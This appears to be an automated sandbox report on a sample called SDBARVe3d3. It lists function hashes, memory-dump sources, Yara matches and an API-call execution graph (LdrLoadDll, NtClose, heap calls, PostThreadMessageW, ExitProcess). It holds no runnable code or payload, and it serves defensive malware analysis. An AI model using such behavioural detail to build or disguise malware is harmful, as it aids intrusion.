                                                                                                                                    • Instruction ID: e0bc50907592a34782a5868cb52783498a31a14d17c2f98a2db0f79ee60c3d1b
                                                                                                                                    • Opcode Fuzzy Hash: 819b6feae9d3bc49dabe3210482b3853f213cc7168a07750b265d053291d2009
                                                                                                                                    • Instruction Fuzzy Hash: 30E1F8B4E1015A8FCB14DFA9C5809AEBBF6FF89304F249169D414AB356DB31AD42CF60
                                                                                                                                    Function 072933A8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b195b17efd424fa06e372d810a69ef26163f38331301e24d3d8f37d41fcb7870
                                                                                                                                    • Instruction ID: 12c8775abcfcd686f132d9e6fb507225e52da9c56ee80ef4ce5d153cb08ef4d7
                                                                                                                                    • Opcode Fuzzy Hash: b195b17efd424fa06e372d810a69ef26163f38331301e24d3d8f37d41fcb7870
                                                                                                                                    • Instruction Fuzzy Hash: 20E1FCB4E101598FCB14DFA9C5809AEFBF6BF89304F249169D414AB356DB30AD42CFA1
                                                                                                                                    Function 07291878 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8f3feb464dc0ce83d437b4eade20bc0fd87bdf13110dbaeca383585a2c536780
                                                                                                                                    • Instruction ID: 42b7ae1184c4aec7c1a715e282976766283f5279905ec4a97e81a355b0841e5e
                                                                                                                                    • Opcode Fuzzy Hash: 8f3feb464dc0ce83d437b4eade20bc0fd87bdf13110dbaeca383585a2c536780
                                                                                                                                    • Instruction Fuzzy Hash: D8E11CB4E1015A8FCB14DFA9C580AAEFBF6BF49304F249169D414AB355DB30AD42CF61
                                                                                                                                    Function 0516D6C4 Relevance: .3, Instructions: 264COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ac6a9412e86e6085903900f795507f10f20ce672b0a7be8a604e4197c85735ca
                                                                                                                                    • Instruction ID: c73d22cc0591e6cb9c1e91fb28cadd8b4beade567acaeb4d302d53c60aa8c635
                                                                                                                                    • Opcode Fuzzy Hash: ac6a9412e86e6085903900f795507f10f20ce672b0a7be8a604e4197c85735ca
                                                                                                                                    • Instruction Fuzzy Hash: 99A17136F10215CFCF05DFB4D4849AEBBB2FF85300B15856AE806AB269DB71D966CB40
                                                                                                                                    Function 07291860 Relevance: .1, Instructions: 139COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9957e2f1eb03443b06c0ad98c8bffb33a7f57a48b3a9bd2f4383cbdcdce72d82
                                                                                                                                    • Instruction ID: 867a9c57bb07da3d3ca7fe08fb677da2bfb4060f7f22060b908ae1555e878e2d
                                                                                                                                    • Opcode Fuzzy Hash: 9957e2f1eb03443b06c0ad98c8bffb33a7f57a48b3a9bd2f4383cbdcdce72d82
                                                                                                                                    • Instruction Fuzzy Hash: F0511FB4E1425A8FDB14CFAAC5405AEFBF6BF89304F24C169D418AB256D7305E42CF61
                                                                                                                                    Function 07293C08 Relevance: .1, Instructions: 135COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c17bf3c16778bec26fdd775a8bf75ed120a74fc7fce3120394a08843a916ca47
                                                                                                                                    • Instruction ID: 9e1f425e49a71dc02402f4b11601f5ad3664ceea227ba36526d320b0c2b10316
                                                                                                                                    • Opcode Fuzzy Hash: c17bf3c16778bec26fdd775a8bf75ed120a74fc7fce3120394a08843a916ca47
                                                                                                                                    • Instruction Fuzzy Hash: DA510CB0E102598FDB14CFA9C5505AEFBF6BF89304F24816AD418AB356D7319A42CFA1
                                                                                                                                    Function 072937DB Relevance: .1, Instructions: 127COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 750b5760aac898465bd8b971ff019cb5d11966406db0974dc33a5f41c054a3a8
                                                                                                                                    • Instruction ID: 19e58899b418005b2e5ffc962d10a59781fd2c54d5a2f4526926d60a8927612c
                                                                                                                                    • Opcode Fuzzy Hash: 750b5760aac898465bd8b971ff019cb5d11966406db0974dc33a5f41c054a3a8
                                                                                                                                    • Instruction Fuzzy Hash: 40510CB4E102198BDB14DFA9C5806AEFBF6BF89304F24C169D418AB316D7319A42CF61

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:1.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                    Signature Coverage:7.5%
                                                                                                                                    Total number of Nodes:146
                                                                                                                                    Total number of Limit Nodes:13
                                                                                                                                    execution_graph 90895 4249e3 90896 4249ff 90895->90896 90897 424a27 90896->90897 90898 424a3b 90896->90898 90899 42c633 NtClose 90897->90899 90905 42c633 90898->90905 90901 424a30 90899->90901 90902 424a44 90908 42e863 RtlAllocateHeap 90902->90908 90904 424a4f 90906 42c64d 90905->90906 90907 42c65e NtClose 90906->90907 90907->90902 90908->90904 90909 42f7e3 90910 42f7f3 90909->90910 90911 42f7f9 90909->90911 90914 42e823 90911->90914 90913 42f81f 90917 42c943 90914->90917 90916 42e83e 90916->90913 90918 42c95d 90917->90918 90919 42c96e RtlAllocateHeap 90918->90919 90919->90916 91035 424d73 91040 424d8c 91035->91040 91036 424e1f 91037 424dd7 91038 42e743 RtlFreeHeap 91037->91038 91039 424de7 91038->91039 91040->91036 91040->91037 91041 424e1a 91040->91041 91042 42e743 RtlFreeHeap 91041->91042 91042->91036 91043 42bc33 91044 42bc4d 91043->91044 91047 1762df0 LdrInitializeThunk 91044->91047 91045 42bc75 91047->91045 90920 414023 90921 41403d 90920->90921 90926 417793 90921->90926 90923 41405b 90924 4140a0 90923->90924 90925 41408f PostThreadMessageW 90923->90925 90925->90924 90927 4177b7 90926->90927 90928 4177f3 LdrLoadDll 90927->90928 90929 4177be 90927->90929 90928->90929 90929->90923 90930 41b2c3 90931 41b307 90930->90931 90932 41b328 90931->90932 90933 42c633 NtClose 90931->90933 90933->90932 90934 413ac3 90935 413adf 90934->90935 90938 42c8b3 90935->90938 90939 42c8cd 90938->90939 90942 1762c70 LdrInitializeThunk 90939->90942 90940 413ae5 90942->90940 91048 41a573 91049 41a5e5 91048->91049 91050 41a58b 91048->91050 91050->91049 91052 41e4c3 91050->91052 91053 41e4e9 91052->91053 91059 41e5e9 91053->91059 91061 42f913 91053->91061 91055 41e57e 91056 41e5e0 91055->91056 91057 42bc83 LdrInitializeThunk 91055->91057 91055->91059 91056->91059 91067 4289f3 91056->91067 91057->91056 91059->91049 91060 41e69b 91060->91049 91062 42f883 91061->91062 91063 42f8e0 91062->91063 91064 42e823 RtlAllocateHeap 91062->91064 91063->91055 91065 42f8bd 91064->91065 91066 42e743 RtlFreeHeap 91065->91066 91066->91063 91068 428a58 91067->91068 91069 428a93 91068->91069 91072 418b63 91068->91072 91069->91060 91071 428a75 91071->91060 91073 418b42 91072->91073 91074 418b72 91072->91074 91075 42c9e3 ExitProcess 91073->91075 91076 418b4b 91075->91076 91076->91071 90943 401b24 90944 401b47 90943->90944 90947 42fcb3 90944->90947 90950 42e2b3 90947->90950 90951 42e2f6 90950->90951 90962 407283 90951->90962 90953 42e30c 90961 401bf8 90953->90961 90965 41b0d3 90953->90965 90955 42e32b 90956 42e340 90955->90956 90980 42c9e3 90955->90980 90976 428303 90956->90976 90959 42e35a 90960 42c9e3 ExitProcess 90959->90960 90960->90961 90964 407290 90962->90964 90983 4164a3 90962->90983 90964->90953 90966 41b0ff 90965->90966 91007 41afc3 90966->91007 90969 41b144 90972 41b160 90969->90972 90974 42c633 NtClose 90969->90974 90970 41b12c 90971 41b137 90970->90971 90973 42c633 NtClose 90970->90973 90971->90955 90972->90955 90973->90971 90975 41b156 90974->90975 90975->90955 90978 428365 90976->90978 90977 428372 90977->90959 90978->90977 91018 418613 90978->91018 90981 42c9fd 90980->90981 90982 42ca0e ExitProcess 90981->90982 90982->90956 90984 4164c0 90983->90984 90986 4164d9 90984->90986 90987 42d083 90984->90987 90986->90964 90989 42d09d 90987->90989 90988 42d0cc 90988->90986 90989->90988 90994 42bc83 90989->90994 90995 42bc9d 90994->90995 91001 1762c0a 90995->91001 90996 42bcc9 90998 42e743 90996->90998 91004 42c993 90998->91004 91000 42d145 91000->90986 91002 1762c11 91001->91002 91003 1762c1f LdrInitializeThunk 91001->91003 91002->90996 91003->90996 91005 42c9ad 91004->91005 91006 42c9be RtlFreeHeap 91005->91006 91006->91000 91008 41afdd 91007->91008 91012 41b0b9 91007->91012 91013 42bd23 91008->91013 91011 42c633 NtClose 91011->91012 91012->90969 91012->90970 91014 42bd40 91013->91014 91017 17635c0 LdrInitializeThunk 91014->91017 91015 41b0ad 91015->91011 91017->91015 91020 41863d 91018->91020 91019 418b4b 91019->90977 91020->91019 91026 413ca3 91020->91026 91022 41876a 91022->91019 91023 42e743 RtlFreeHeap 91022->91023 91024 418782 91023->91024 91024->91019 91025 42c9e3 ExitProcess 91024->91025 91025->91019 91028 413cc3 91026->91028 91029 413d2c 91028->91029 91031 41b3e3 RtlFreeHeap LdrInitializeThunk 91028->91031 91029->91022 91030 413d22 91030->91022 91031->91030 91077 1762b60 LdrInitializeThunk 91032 418d68 91033 42c633 NtClose 91032->91033 91034 418d72 91033->91034

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00417793 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 91 417793-4177af 92 4177b7-4177bc 91->92 93 4177b2 call 42f323 91->93 94 4177c2-4177d0 call 42f923 92->94 95 4177be-4177c1 92->95 93->92 98 4177e0-4177f1 call 42dd83 94->98 99 4177d2-4177dd call 42fbc3 94->99 104 4177f3-417807 LdrLoadDll 98->104 105 41780a-41780d 98->105 99->98 104->105
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                                                                                    • Instruction ID: 8c201cb86210103d8ff0389f06be1b6184587a7a4bbc6cbf00069c90d1d8dc7c
                                                                                                                                    • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                                                                                    • Instruction Fuzzy Hash: F3015EB5E0020DBBDB10DAE1DC42FDEB7789B14308F4041AAE91897280FA34EB488B95
                                                                                                                                    Function 0042C633 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 121 42c633-42c66c call 4047d3 call 42d873 NtClose
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C667
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                                                                                    • Instruction ID: c58c7d579e4e2bacd6c01519c7e0221e1a66a8a060063ee453bb1f2e55cecb1d
                                                                                                                                    • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                                                                                    • Instruction Fuzzy Hash: 67E0D632600204BBE220AA5AEC02F8BB3ACCBC5714F00401AFA0CA7242C270B91086F5
                                                                                                                                    Function 01762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                                                    • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                                                                                                                    • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                                                    • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
                                                                                                                                    Function 01762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                                                    • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                                                                                                                    • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                                                    • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
                                                                                                                                    Function 01762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                                                    • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                                                                                                                    • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                                                                                                    • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
                                                                                                                                    Function 017635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                                                    • Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
                                                                                                                                    • Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                                                                                                    • Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3
                                                                                                                                    Function 00413FBB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 1836367815-3456940251
                                                                                                                                    • Opcode ID: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                                                                                                    • Instruction ID: 874110b21b3390a429e1172821fe310f6061561dc3fbdce207ccc568e88ba2fc
                                                                                                                                    • Opcode Fuzzy Hash: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                                                                                                    • Instruction Fuzzy Hash: 06115972E002587BDB119AE28C41DEFBB7DAF81358F04805AF90467241D2784E4747A5
                                                                                                                                    Function 00414023 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 1836367815-3456940251
                                                                                                                                    • Opcode ID: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                                                                                                    • Instruction ID: c1e20e2142e366b389da3563046297cec7b91a3900e043a758beaaf28deb081d
                                                                                                                                    • Opcode Fuzzy Hash: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                                                                                                    • Instruction Fuzzy Hash: 0A01DB71E0021C7AEB10ABD19C81DEF7B7CEF81798F448069FA0467141D6785E0647A5
                                                                                                                                    Function 00413FDF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 30 413fdf-413feb 30->30 31 413fed-413ff0 30->31 32 414053-414055 31->32 33 413ff2-413ffc 31->33 34 41405b-41408d call 404743 call 424e93 32->34 35 414056 call 417793 32->35 33->32 40 4140ad-4140b3 34->40 41 41408f-41409e PostThreadMessageW 34->41 35->34 41->40 42 4140a0-4140aa 41->42 42->40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0349A-n$0349A-n
                                                                                                                                    • API String ID: 0-3456940251
                                                                                                                                    • Opcode ID: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                                                                                                    • Instruction ID: bd3507925f1ca423312bb13a029e2d8f4e8582ed727c1f867d54eba86e7c9970
                                                                                                                                    • Opcode Fuzzy Hash: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                                                                                                    • Instruction Fuzzy Hash: 0A0147B6A01249BEDB105BA24C81CEF7B7DDED2758B048066F904E7241D6784E4647BA
                                                                                                                                    Function 0042C993 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 43 42c993-42c9d4 call 4047d3 call 42d873 RtlFreeHeap
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9CF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID: =eA
                                                                                                                                    • API String ID: 3298025750-3399696693
                                                                                                                                    • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                                                                                    • Instruction ID: 5bf54a144608e309584a604ebbd06080e81bb27e9496a35fdb293cb900648e28
                                                                                                                                    • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                                                                                    • Instruction Fuzzy Hash: EDE065B66143047BD610EE9AEC45FAB33ACEFC9750F00441AFA19A7242D770BD118BB9
                                                                                                                                    Function 0042C943 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 116 42c943-42c984 call 4047d3 call 42d873 RtlAllocateHeap
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(?,0041E57E,?,?,00000000,?,0041E57E,?,?,?), ref: 0042C97F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                                                                                    • Instruction ID: 6c94c9b0a68df69252c11d37fe3a6ed2ea0c874f6190d84ced6cb7a8f7b23c15
                                                                                                                                    • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                                                                                    • Instruction Fuzzy Hash: 6EE06DB16042047BD610EE59DC81F9B37ADEFC5714F004019FA1CA7241C674B9108AB9
                                                                                                                                    Function 00417786 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 106 417786-4177d0 108 4177e0-4177f1 call 42dd83 106->108 109 4177d2-4177dd call 42fbc3 106->109 114 4177f3-417807 LdrLoadDll 108->114 115 41780a-41780d 108->115 109->108 114->115
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                                                                                    • Instruction ID: 5e67de2430df7b926fa19ab7142ee4ef2541c361e8587618277fac3dc212a9f4
                                                                                                                                    • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                                                                                    • Instruction Fuzzy Hash: D8F0A7B5E04109ABCB11DBD0DC52FEEB7749F04304F108297F5189A280F535EB45CB55
                                                                                                                                    Function 0042C9E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 126 42c9e3-42ca1c call 4047d3 call 42d873 ExitProcess
                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,089F3F9E,?,?,089F3F9E), ref: 0042CA17
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    • Opcode ID: fdc901fa64855fd1b6121672eb0d8bf45718e0c92ca995efb245744b1db379a0
